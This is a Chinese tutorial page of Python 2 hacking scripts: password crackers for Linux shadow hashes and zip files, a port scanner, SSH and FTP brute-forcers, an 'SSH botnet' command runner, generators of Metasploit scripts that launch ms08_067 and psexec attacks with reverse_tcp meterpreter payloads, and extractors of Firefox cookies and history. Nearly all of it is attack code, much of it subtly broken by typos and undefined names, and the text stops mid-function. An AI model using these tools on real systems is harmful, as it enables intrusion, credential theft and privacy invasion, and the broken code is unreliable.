某教程涉及脚本
1、Linux口令破解
# encoding: utf-8
import crypt
def testpass(cryptpass):
#盐值,取两个$之间的字符串
salt = cryptpass[cryptpass.find("$"):cryptpass.rfind("$")]
#读取字典内容
dictfile = open('dictionary.txt','r')
#将字典里每行拿出来进行加密比对
for word in dictfile.readlines():
word = word.strip('\n') # 去掉密码后的换行符
# 将密码与盐值一起加密得到加密后的密文
cryptword = crypt.crypt(word,salt)
#将加密得到的密文与原始密文进行对比
if (cryptword == cryptpass):
print "[+] found password: " + word + "\n"
return
print "[-] password notfound.\n"
return
def main():
# 读取密码文件得到Linux口令
passfile = open('mima.txt')
# 对每一条口令进行破解
for line in passfile.readlines():
# 以口令中的:为分隔符
if ":" in line:
# 以第一个分隔符之前的为用户名
user = line.split(':')[0]
# 第一个分隔符与第二个之间的为加密口令
cryptpass = line.split(':')[1].strip(' ')
print "[*] cracking password for : " + user
# 口令破解
testpass(cryptpass)
if if __name__ == "__main__":
main()2、zip文件口令破解
zipfile库最初体验
# encoding: utf-8
import zipfile
# 实例化压缩文件
zfile = zipfile("test.zip")
try:
# 使用正确的密码解压文件
zfile.extractall(pwd="123456")
except Exception,e:
print e使用extractall函数进行口令破解
# encoding: utf-8
import zipfile
zfile = zipfile.ZipFile("test.zip")
# 打开字典
passfile = open('dictonary.txt')
# 遍历字典中的每一行
for line in passfile.readlines():
# 去掉每一行末尾的换行符即为密码
password = line.strip('\n')
try:
# 用每行的密码尝试解压文件
zfile.extractall(pwd=password)
# 解压成功,则打印密码
print '[+] password = ' + password + '\n'
exit(0)
# 密码不正确则抛出异常并尝试下一个密码
except Exception,e:
pass添加了函数模块化
# encoding: utf-8
import zipfile
# 模块化脚本,创建解压脚本函数
def extractfile(zfile,password):
try:
# 尝试解压文件,成功返回密码,否则抛出异常
zfile.extractall(pwd = password)
return password
except:
return
def mian():
# 实例化压缩文件
zfile = zipfile.ZipFile('test.zip')
# 打开字典
passfile = open('pass.txt')
# 将字典每行的密码进行匹配
for line in passfile.readlines():
password = line.strip('\n')
# 调用解压函数
guess = extractfile(zfile,password)
if guess: # 要是guess是TRUE,则打印出密码
print '[+] password = ' + password + '\n'
exit(0)
if __name__ == "__main__":
mian()3、端口扫描器
# encoding: utf-8
import optparse
# 创建对象实例
parser = optparse.OptionParser('usage %prog -H <target host> -p <target ports>')
# 需要的命令行参数
parser.add_option('-H',dest='Host',type='srting',help='specify target host')
parser.add_option('-p',dest='ports',type='srting',help='specify target host')
# 解析命令行
(Option,args) = parser.parse_args()
# 实例化参数
Host = Options.host
Ports = str(Options.Ports).split(',')
if (Host == None)|(Ports == None):
print parser.usage
exit(0)# encoding: utf-8
import optparse
# 使用socket库
from socket import *
def connscan(host,port):
try:
# 实例化socket
connskt = socket(AF_INET,SOCK_STREAM)
# socket连接目标端口,连接成功则打印出该端口
connskt.connect((host,port))
print '[+] %d/tcp open'% port
# 关闭连接
connskt.close()
except:
# 端口连接不成功打印出错误信息
print '[-] %d/tcp closed'% port
def portscan(host,ports):
try:
# 获取目标IP地址
ip = gethostbyname(host)
except:
# 获取不到IP地址,打印出错误信息
print "[-] cannot resolve '%s' : unknown host" %host
return
try:
# 获取目标主机名
name = gethostbyaddr(ip)
print '\n[+] scan result for: '+name[0]
except:
# 获取不到主机名则显示IP
print '\n[+] scan result for: '+ip
# 设置默认超市时间
setdefaulttimeout(1)
# 遍历每个端口
for port in ports:
print 'scanning port '+port
# 调用连接函数
connscan(host,int(ports))# encoding: utf-8
import parser
from socket import *
def connscan(host,port):
try:
connskt = socket(AF_INET,SOCK_STREAM)
connskt.connect((host,port))
# 向连接成功的端口发送字符串
connskt.send('quiet simple\r\n')
# 接收目标端口返回值
results = connskt.recv(100)
print '[+] %d/tcp open'% port
# 打印出目标端口的发回执
print '[+] ' + str(results)
connskt.close()
except:
print '[-] %d/tcp closed'% port
def portscan(host,ports):
try:
ip = gethostbyname(host)
except:
print "[-] cannot resolve '%s': unknown host" %host
return
try:
name = gethostbyaddr(ip)
print '\n[+] scan results for :'+name[0]
except:
print '\n[+] scan results for :'+ip
setdefaulttimeout(1)
for port in ports:
print 'scanning port' + port
connscan(host,int(port))
def main():
parser = optparse.optionparser('usage %prog -H <target host> -p <target ports>')
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-p',dest='ports',type='string',help='specify target ports')
(options,args) = parser.parser_args()
host = options.host
ports = str(options.ports).split(',')
if (host == None) | (ports == None):
print parser.usage
exit(0)
# 调用函数进行扫描
portscan(host,ports)
if __name__ == "__main__":
main()# encoding: utf-8
import parser
from socket import *
from threading import *
# 实例化一个信号量
screenlock = Semaphore(value=1)
def connscan(host,port):
try:
connskt = socket(AF_INET,SOCK_STREAM)
connskt.connect((host,port))
connskt.send('quiet simple\r\n')
results = connskt.recv(100)
# 加锁
screenlock.acquire()
print '[+] %d/tcp open'% port
print '[+] ' + str(results)
except:
screenlock.acquire()
print '[-] %d/tcp closed'% port
finally:
# 解锁
screenlock.release()
connskt.close()
def portscan(host,ports):
try:
ip = gethostbyname(host)
except:
print "[-] cannot resolve '%s': unknown host" %host
return
try:
name = gethostbyaddr(ip)
print '\n[+] scan results for :'+name[0]
except:
print '\n[+] scan results for :'+ip
setdefaulttimeout(1)
for port in ports:
print 'scanning port' + port
connscan(host,int(port))
def main():
parser = optparse.optionparser('usage %prog -H <target host> -p <target ports>')
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-p',dest='ports',type='string',help='specify target ports')
(options,args) = parser.parser_args()
host = options.host
ports = str(options.ports).split(',')
if (host == None) | (ports == None):
print parser.usage
exit(0)
portscan(host,ports)
if __name__ == "__main__":
main()4、构建SSH僵尸网络
# encoding: utf-8
# 引用第三方库
import pexpect
# 命令行提示符
PROMPT = ['#','>>>','>','\$']
# 传递命令
def send_command(child,cmd):
child.sendline(cmd)
# 期望获得的命令提示符
child.expect(PROMPT)
# 打印从SSH会话得到的结果
print child.before
# 连接函数
def connect(user,host,password):
ssh_newkey = 'are you sure you want to continue connecting'
# 连接字符串
connstr = 'ssh ' + user + '@' + host
# 实例化连接
child = pexpect.spawn(connstr)
# 捕获ssh_newkey
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
# 判断捕获信息
if ret == 0:
print '[-] error connecting'
return
if ret == 1:
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
print '[-] error connecting'
return
# 输入密码
child.sendline(password)
# 捕获命令提示符
child.expect(PROMPT)
return child
def main():
host = 'localhost'
user = 'root'
password = 'simple123'
# ssh连接
child = connect(user,host,password)
# 发送命令
send_command(child,'ls /root/')
if __name__ == "__main__":
main()# encoding: utf-8
# 引用pxssh库
from pexpect import pxssh
# 引用optparse库
import optparse
# 引用time库
import time
# 引用线程库
from threading import *
# 设置最大连接数
maxconnections = 5
# 设置连接锁
connection_lock = BoundedSemaphore(value=maxconnections)
found = False
fails = 0
# 连接函数
def connect(host,user,password,release):
#全局变量
global found
global fails
try:
# 实例化
s = pxssh.pxssh()
# SSH连接
s.login(host,user,password)
# 连接成功打印密码
print '[+] password found: ' + password
found = True
except Exception,e:
# 判断异常原因,尝试重新连接
if 'read_nonblocking' in str(e):
fails += 1
time.sleep(5)
connect(host,user,password,False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host,user,password,False)
finally:
# 释放锁
if release:
connection_lock.release()
def mian():
# 创建对象
parser = optparse.OptionParser('usage %prog -H <target host> -u <user> -F <password list>')
# 设定参数
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-F',dest='password file',type='string',help='specify password file')
parser.add_option('-u',dest='user',type='string',help='specify the user')
# 解析命令
(options,args) = parser.parser_args()
# 获取参数
host = options.host
passwordfile = options.passwordfile
user = options.user
if host == None or passwordfile == None or user == None:
print parser.usage
exit(0)
# 读取密码
fn = open('passwordfile','r')
# 尝试破解
for line in fn.readlines():
if found:
print "[*] exiting: password found"
exit(0)
if fails > 5:
print "[*] exiting: too many socket Timeouts"
exit(0)
# 加锁
connection_lock.acquire()
password = line.strip('\n')
print "[-] testing: " + str(password)
#实例化线程
t = Thread(target=connect,args=(host,user,password,True))
child = t.start
if __name__ == "__main__":
main()# encoding: utf-8
from pexpect import pxssh
class client:
# 初始化对象
def __init__(self,host,user,password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
# SSH连接
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host,self.user,self.password)
return s
except Exception,e:
print e
print '[-] error connecting'
# 传递命令
def send_command(self,cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
# 遍历botnet发送命令
def botnetcommand(command):
for client in botnet:
output = client.send_command(command)
print '[*] output from ' + client.host
print '[+] ' + output
# 实例化client对象
def addclient(host,user,password):
client = client(host,user,password)
botnet.append(client)
# 记录client对象
botnet = []
addclient('127.0.0.1','root','simplexue123')
addclient('127.0.0.1','root','simplexue123')
addclient('127.0.0.1','root','simplexue123')
botnetcommand('uname -v')
botnetcommand('ls /root')5、FTP口令扫描与网页搜索
# encoding: utf-8
# 引用ftplib库
import ftplib
# 判断目标是否允许匿名登录
def anonlogin(hostame):
try:
ftp = ftplib.FTP(hostame)
# 匿名登录
ftp.login('anonymous','me@youer.com')
print '\n[*]' + str(hostame) + 'FTP anonymous login successded'
ftp.quit()
return True
except Exception,e:
print '\n[-] ' +str(hostame) + 'FTP anonymous logon failed.'
return False
host = '192.168.1.3'
anonlogin(host)# encoding: utf-8
import ftplib
# 暴力破解FTP口令
def brutelogin(hostname,passwdfile):
p = open('passwdfile','r')
# 尝试用每个口令登录目标FTP
for line in p.readlines():
user = line.split(':')[0]
p = line.split(':')[1].strip('\n')
print '[+] trying: ' + user + ': ' + p
try:
ftp = ftplib.FTP(hostname)
ftp.login(user,p)
print '\n[*]' + srt(hostname) + 'FTP login succeeded: ' + user +':' + p
ftp.quit()
return (user,p)
except Exception,e:
pass
print '\n[-] could not brute force ftp credentials.'
return (None,None)
host = '192.168.1.3'
passwdfile = 'pass.txt'
brutelogin(host,passwdfile)# encoding: utf-8
import ftplib
# 发现默认页面
def returndefault(ftp):
try:
# 获取FTP目录
dirlist = ftp.nlist()
except:
dirlist = []
print '[-] could not list directory contents'
print '[-] skipping to next target'
return
# 默认页面列表
retlist = []
for filename in dirlist:
fn = filename.lower()
# 寻找特定后缀的文件名
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print '[+] found default page: ' + filename
retlist.append(filename)
return retlist
host = '192.168.1.3'
username = 'administrator'
password = '123456'
# 实例化FTP连接
ftp = ftplib.FTP(host)
ftp.login(username,password)
returndefault(ftp)# encoding: utf-8
import ftplib
import optparse
# 匿名登录
def anonlogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','me@youer.com')
print '\n[*]' + str(hostame) + 'FTP anonymous login successded'
ftp.quit()
return True
except Exception,e:
print '\n[-] ' +str(hostame) + 'FTP anonymous logon failed.'
return False
# 破解口令
def brutelogin(hostname,passwdfile):
p = open('passwdfile','r')
for line in p.readlines():
user = line.split(':')[0]
p = line.split(':')[1].strip('\n')
print '[+] trying: ' + user + ': ' + p
try:
ftp = ftplib.FTP(hostname)
ftp.login(user,p)
print '\n[*]' + srt(hostname) + 'FTP login succeeded: ' + user +':' + p
ftp.quit()
return (user,p)
except Exception,e:
pass
print '\n[-] could not brute force ftp credentials.'
return (None,None)
# 发现默认页面
def returndefault(ftp):
try:
dirlist = ftp.nlist()
except:
dirlist = []
print '[-] could not list directory contents'
print '[-] skipping to next target'
return
retlist = []
for filename in dirlist:
fn = filename.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print '[+] found default page: ' + filename
retlist.append(filename)
return retlist
def mian():
parser = optparse.OptionParser('usage %prog -H <target host[s]> [-f <userpass file>]')
parser.add_option('-H',dest='thost',type='string',help='specify target host')
parser.add_option('-f',dest='passwdfile',type='string',help='specify user/password file')
(options,args) = parser.parser_args()
thost = options.thost
passwdfile = options.passwdfile
if thost == None:
print parser.usage
exit (0)
username = None
password = None
# 尝试匿名登录
if anonlogin(thost) == True:
username = 'administrator'
password = '123456'
ftp = ftplib.FTP(thost)
ftp.login(username,password)
returndefault(ftp)
# 尝试暴力破解登录
elif passwdfile != None:
(username,password) = brutelogin(thost,passwdfile)
ftp = ftplib.FTP(thost)
ftp.login(username,password)
returndefault(ftp)
if __name__ == "__main__":
main()6、python脚本与metasploit交互
# encoding: utf-8
# 使用nmap库
import nmap
def findtarget():
# 实例化端口扫描
nmscan = nmap,portscanner()
# 扫描开放了445端口的主机并将其放置在数组中返回
nmscan.scan(subnet,'445')
targets = []
for t in nmscan.all_hosts():
if nmscan[t].has_tcp(445):
state = nmscan[t]['tcp'][445]['state']
if state == 'open':
print '[+] found target host: ' + t
targets.append(t)
return targets# encoding: utf-8
##
# 监听被黑掉的目标
def setuphandler(configfile,lhost,lport):
# 使用该模块发布命令
configfile.write('use exploit/multi/handler\n')
# 设定载荷,IP,端口
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
configfile.write('exploit -j -z\n')
# 不重复新建监听器
configfile.write('setg DisablePaloadHandler 1\n')# encoding: utf-8
# 漏洞利用
def setuphandler(configfile,target,lhost,lport):
# 漏洞利用代码
configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
# 设定参数
configfile.write('set RHOST ' + str(target) + '\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
# 执行
configfile.write('exploit -j -z\n')# encoding: utf-8
# SMB暴力破解
def smbbrute(configfile,target,passwdfile,lhost,lport):
username = 'Administrator'
passwdfile = open(passwdfile,'r')
# 逐个密码尝试进行破解
for password in passwdfile.readlines():
password = password.strip('\n').strip
configfile.write('use exploit/windows/smb/psexec\n')
configfile.write('set SMBUser ' + str(username) + '\n')
configfile.write('set SMBUser ' + str(password) + '\n')
configfile.write('set RHOST ' + str(target) + '\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
configfile.write('exploit -j -z\n')# encoding: utf-8
##
import os
import optparse
import sys
import nmap
# 与nmap交互发现开放了445端口的主机
def findtarget():
# 实例化端口扫描
nmscan = nmap,portscanner()
nmscan.scan(subnet,'445')
targets = []
for t in nmscan.all_hosts():
if nmscan[t].has_tcp(445):
state = nmscan[t]['tcp'][445]['state']
if state == 'open':
print '[+] found target host: ' + t
targets.append(t)
return targets
# 监听被黑掉的目标
def setuphandler(configfile,lhost,lport):
configfile.write('use exploit/multi/handler\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
configfile.write('exploit -j -z\n')
configfile.write('setg DisablePaloadHandler 1\n')
# 攻击模块
def setuphandler(configfile,target,lhost,lport):
configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
configfile.write('set RHOST ' + str(target) + '\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
configfile.write('exploit -j -z\n')
# SMB暴力破解
def smbbrute(configfile,target,passwdfile,lhost,lport):
username = 'Administrator'
passwdfile = open(passwdfile,'r')
for password in passwdfile.readlines():
password = password.strip('\n').strip
configfile.write('use exploit/windows/smb/psexec\n')
configfile.write('set SMBUser ' + str(username) + '\n')
configfile.write('set SMBUser ' + str(password) + '\n')
configfile.write('set RHOST ' + str(target) + '\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set LPORT ' + str(lport) + '\n')
configfile.write('set LHOST ' + lhost + '\n')
configfile.write('exploit -j -z\n')
def main():
# 写方式打开配置文件
configfile = open('meta.rc','w')
parser = optparse.optionparser('[-] usage %prog -H <RHOST[s]> -l <LHOST> [-p <LPORT -F <password file>]')
parser.add_option('-H',dest='target',type='string',help='specify the target address[es]')
parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
parser.add_option('-l',dest='lhost',type='string',help='specify the listen address')
parser.add_option('-F',dest='passwdfile',type='string',help='password file for SMB brute force attempt')
(options,args) = parser.parser_args()
if (opyions.target == None) | (lhost == None):
print parser.usage
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '2333'
passsdfile = options.passsdfile
# 寻找目标
targets = findtarget(options.target)
setuphandler(configfile,lhost,lport)
# 逐个攻击
for target in targets:
confickerexploit(configfile,target,lhost,lport)
if passwdfile != None:
smbbrute(configfile,target,passsdfile,lhost,lport)
configfile.close()
# 启动metasploit并读取配置文件
os.system('msfconsole -r meta.rc')
if __name__ == "__main__":
main()7、回收站内容检查
# encoding: utf-8
import os
def returndir():
dirs = ['C:\\Recycler\\','C:\\Recycled\\','C:\\Recycle.Bin\\']
for recycledir in dirs:
if os.path.isdir(recycledir):
return recycledir
return None
print returndir()# encoding: utf-8
# 导入注册表库
from _winreg import *
#提取注册表中存放的用户名
def sid2user(sid):
try:
key = Openkey(HKEY_LOCAL_MAACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(Value,type) = QueryValueEx(key,'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid# encoding: utf-8
import os
from _winreg import *
def sid2user(sid):
try:
key = Openkey(HKEY_LOCAL_MAACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(Value,type) = QueryValueEx(key,'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def returndir():
dirs = ['C:\\Recycler\\','C:\\Recycled\\','C:\\Recycle.Bin\\']
for recycledir in dirs:
if os.path.isdir(recycledir):
return recycledir
return None
def findrecycled(recycledir):
dirlist = os.listdir(recycledir)
for sid in dirlist:
files = os.listdir(recycledir + sid)
user = sid2user(sid)
print '\n[*] listing files for user:' + str(user)
for file in files:
print '[+] found file: ' + str(file)
def mian():
recycledir = returndir()
findrecycled(recycledir)
if __name__ == "__main__":
main()
8、读取文件EXIF元数据
# encoding: utf-8
import urllib2
# 导入相关库
from bs4 import BeautifulSoup
# 发现网页中的图片
def findimages(url):
print '[+\ finding images on ' + url
# 读取HTML中的文档内容
urlcontent = urllib2.open(url).read()
# 创建一个beautifulsoup对象
soup = BeautifulSoup(urlcontent,"lxml")
# 寻找所有标记为img的标签
imgtags = soup.findall('img')
return imgtags# encoding: utf-8
# 导入相应库
import urllib2
from os.path import basename
from urlparse import urlsplit
# 下载图片
def downloadimage(imgtag,url):
try:
print '[+] downloading image...'
# 图片地址
imgsrc = imgtag['src']
# 读取图片内容
imgcontent = urllib2.urlopen(url + imgsrc).read()
imgfilename = basename(urlsplit(imgsrc0[2]))
imgfile = open(imgfilename,'wb')
# 写入图片内容
imgfile.write(imgcontent)
imgfile.close()
return imgfilename
except:
return ''# encoding: utf-8
def testforexif(imgfilename):
try:
exifdata = {}
imgfile = image.open(imgfilename)
# 获取文件中的元数据
info = imgfile._getexif()
if info:
# 遍历元数据数组查找含有GPSInfo的exif标签
for (tag,value) in info.items():
decoded = tags.get(tag,tag)
exifdata[decoded] = value
exifgps = exifdata['gpsinfo']
if exifgps:
print '[*] ' + imgfilename + ' cintains GPS metadata'
except:
pass# encoding: utf-8
# 导入相应库
import urllib2
import optparse
from bs4 import BeautifulSoup
from urlparse import urlsplit
from os.path import basename
from PIL import image
from PIL.exiftags import tags
# 寻找图片标签
def findimages(url):
print '[+\ finding images on ' + url
# 读取HTML中的文档内容
urlcontent = urllib2.open(url).read()
# 创建一个beautifulsoup对象
soup = BeautifulSoup(urlcontent,"lxml")
# 寻找所有标记为img的标签
imgtags = soup.findall('img')
return imgtags
# 下载图片
def downloadimage(imgtag,url):
try:
print '[+] downloading image...'
# 图片地址
imgsrc = imgtag['src']
# 读取图片内容
imgcontent = urllib2.urlopen(url + imgsrc).read()
imgfilename = basename(urlsplit(imgsrc0[2]))
imgfile = open(imgfilename,'wb')
# 写入图片内容
imgfile.write(imgcontent)
imgfile.close()
return imgfilename
except:
return ''
# 查看元数据寻找GPSInfo
def testforexif(imgfilename):
try:
exifdata = {}
imgfile = image.open(imgfilename)
# 获取文件中的元数据
info = imgfile._getexif()
if info:
# 遍历元数据数组查找含有GPSInfo的exif标签
for (tag,value) in info.items():
decoded = tags.get(tag,tag)
exifdata[decoded] = value
exifgps = exifdata['gpsinfo']
if exifgps:
print '[*] ' + imgfilename + ' cintains GPS metadata'
except:
pass
# 主函数运行
def main():
parser = optparse.optionparser('usage %prog -u <target url>')
parser.add_option('-u',dest='url',type='string',help='specify url address')
(options,args) = parser.parser_args()
url = options.url
if url == None:
print parser.usage
exit(0)
else:
imgtags = findimages(url)
for imgtag in imgtags:
imgfilename = downloadimage(imgtag,url)
testforexif(imgfilename)
if __name__ == "__main__":
mian()9、解析火狐浏览器ssqlite3数据库
# -*- coding: utf-8 -*-
import sqlite3 #导入库
def printDownloads(downloadDB): #查看下载记录
conn = sqlite3.connect(downloadDB) #链接数据库
c = conn.cursor() #实例化
c.execute('SELECT name,source,datetime(endTime/1000000,\'unixepoch\') FORM moz_downloads;') #数据库查询
print '\n[*] --- Files Downloaded ---'
for row in c:
print '[+] Fiel: ' + str(row[0]) + 'from source: ' + str(row[1]) + 'at:' + str(row[2])
def main():
downloadDB = 'downloads.sqlite'
printDownloads(downloadDB)
if __name__ == '__main__':
main()
import sqlite3 #导入库
def printCookies(cookiesDB): #读取cookie数据库内容
try:
conn = sqlite3.connect(cookiesDB) #链接数据库
c = conn.cursor() #实例化
c.execute('SELECT host,name,value FORM moz_cookies;') #数据库查询
print '\n[*] --- Found Cookies ---'
for row in c:
host = str(row[0])
name = str(row[1])
value = str(row[2])
print '[+] Host: ' + host + 'name: ' + name + 'Value:' + value
except Exception,e:
if 'encrypted' in str(e):
print '\n[*] Error reading your cookies database. '
print '[*] Upgrade your Python-sqlite3 Library'
def main():
cookiesDB = 'cookies.sqlite'
printCookies(cookiesDB)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
import sqlite3
# 读取历史记录
def printHistory(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
# 数据库查询
c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.places_id;')
print '\n[*] -- Found History --'
for row in c:
url = str(row[0])
date = str(row[1])
print '[+]'+ date + ' -Visited: ' + url
except Exception,e:
if 'encrypted' in str(e):
print '\n[*] Error readming your places database.'
print '[*] Upgrade your Python-Sqlite2 Library.'
exit(0)
def main():
placesDB = 'places.sqlite'
printHistory(placesDB)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
import sqlite3
import re
# 读取历史记录
def printGoogle(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
# 数据库查询
c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.places_id;')
print '\n[*] -- Found Google --'
for row in c:
url = str(row[0])
date = str(row[1])
if 'google' in url.lower():
r = re.findall(r'q=.*\&', url)
if r:
search = r[0].split('&')[0]
search = search.replace('q=','').replace('+','')
print '[+]'+ date + ' -Searched For: ' + search
except Exception,e:
print e
def main():
placesDB = 'places.sqlite'
printGoogle(placesDB)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
import optparse
import os
import sqlite3
import re
def printDownloads(downloadDB): #查看下载记录
conn = sqlite3.connect(downloadDB) #链接数据库
c = conn.cursor() #实例化
c.execute('SELECT name,source,datetime(endTime/1000000,\'unixepoch\') FORM moz_downloads;') #数据库查询
print '\n[*] --- Files Downloaded ---'
for row in c:
print '[+] Fiel: ' + str(row[0]) + 'from source: ' + str(row[1]) + 'at:' + str(row[2])
def printCookies(cookiesDB): #读取cookie数据库内容
try:
conn = sqlite3.connect(cookiesDB) #链接数据库
c = conn.cursor() #实例化
c.execute('SELECT host,name,value FORM moz_cookies;') #数据库查询
print '\n[*] --- Found Cookies ---'
for row in c:
host = str(row[0])
name = str(row[1])
value = str(row[2])
print '[+] Host: ' + host + 'name: ' + name + 'Value:' + value
except Exception,e:
if 'encrypted' in str(e):
print '\n[*] Error reading your cookies database. '
print '[*] Upgrade your Python-sqlite3 Library'
def printHistory(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
# 数据库查询
c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.places_id;')
print '\n[*] -- Found History --'
for row in c:
url = str(row[0])
date = str(row[1])
print '[+]'+ date + ' -Visited: ' + url
except Exception,e:
if 'encrypted' in str(e):
print '\n[*] Error readming your places database.'
print '[*] Upgrade your Python-Sqlite2 Library.'
exit(0)
# 读取历史记录
def printGoogle(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
# 数据库查询
c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.places_id;')
print '\n[*] -- Found Google --'
for row in c:
url = str(row[0])
date = str(row[1])
if 'google' in url.lower():
r = re.findall(r'q=.*\&', url)
if r:
search = r[0].split('&')[0]
search = search.replace('q=','').replace('+','')
print '[+]'+ date + ' -Searched For: ' + search
except Exception,e:
print e
def main():
parser = optparse.OptionParser('Usage %prog -p <firefox profile path>')
parser.add_option('-p',dest='pathName',type='string',help='specify skype profile path')
(options,args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
downloadDB = os.path.join(pathName, 'downloads.sqlite')
if os.path.isfile(downloadDB):
printDownloads(downloadDB)
else:
print '[!] Downloads DB Does Not Exist: ' + downloadDB
cookiesDB = os.path.join(pathName,'cookies.sqlite')
if os.path.isfile(cookiesDB):
printCookies(cookiesDB)
else:
print '[!] Cookies DB Does Not Exist: ' + cookiesDB
placesDB = os.path.join(pathName, 'places.sqlite')
if os.path.isfile(placesDB):
printHistory(placesDB)
printGoogle(placesDB)
else:
print '[!] Places DB Does Not Exist: ' + placesDB
if __name__ == '__main__':
main()10、解析TTL字段值
# -*- coding: utf-8 -*-
from scapy.all import * # 使用scapy库
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src #判断pkt中是否有IP地址
ttl = str(pkt.ttl) # 提取UO地址与TTL并打印出来
print '[+] Pkt Received From: ' + ipsrc + 'with TTL: ' + ttl
except:
pass
def main():
sniff(prn=testTTL,store=0) # 嗅探
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
from scapy.all import * # 使用scapy库
from IPy import IP as IPTEST # 导入相关库并重新命名
ttlValues = {} # TTL值
THRESH = 5 # 中继跳
def checkTTL(ipsrc,ttl):
if IPTEST(ipsrc).iptype() == 'PRIVATE': # 判断返回值
return
if not ttlValues.has_key(ipsrc):
pkt = srl(IP(dst=ipsrc)/ICMP(),retry=0,timeout=1,verbose=0)
ttlValues[ipsrc] = pkt.ttl
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])
# -*- coding: utf-8 -*-
import optparse
from scapy.all import * # 使用scapy库
from IPy import IP as IPTEST # 导入相关库并重新命名
ttlValues = {} # TTL值
THRESH = 5 # 中继跳
def checkTTL(ipsrc,ttl):
if IPTEST(ipsrc).iptype() == 'PRIVATE': # 判断返回值
return
if not ttlValues.has_key(ipsrc):
pkt = srl(IP(dst=ipsrc)/ICMP(),retry=0,timeout=1,verbose=0)
ttlValues[ipsrc] = pkt.ttl
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src #判断pkt中是否有IP地址
ttl = str(pkt.ttl) # 提取UO地址与TTL并打印出来
print '[+] Pkt Received From: ' + ipsrc + 'with TTL: ' + ttl
except:
pass
def main():
parser = optparse.OptionParser("usage %prog" + "-i <interce> -t <tresh>")
parser.add_option('-i',dest='iface',type='string',help='specify network interface')
parser.add_option('-t', dest='thresh', type='int', help='specify threshold count')
(options, args) = parser.parse_args()
if options.iface == None:
conf.iface = 'eth0'
else:
conf.iface = options.iface
if options.tresh != None:
THRESH = options.thresh
else:
THRESH = 5
try:
sniff(prn=testTTL,store=0) # 嗅探
except Exception,e:
print e
if __name__ == '__main__':
main()11、用anonBrowser抓取web页面
# -*- coding: utf-8 -*-
import mechanize, cookielib, random
class anonBrowser(mechanize.Browser):
def __init__(self, proxies=[], user_agents=[]):
mechanize.Browser.__init__(self)
self.set_handle_robots(False)
self.proxies = proxies
self.user_agents = user_agents + ['Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0']
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
self.anonymize()
def clear_cookies(self):
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
def change_user_agent(self):
index = random.randrange(0, len(self.user_agents))
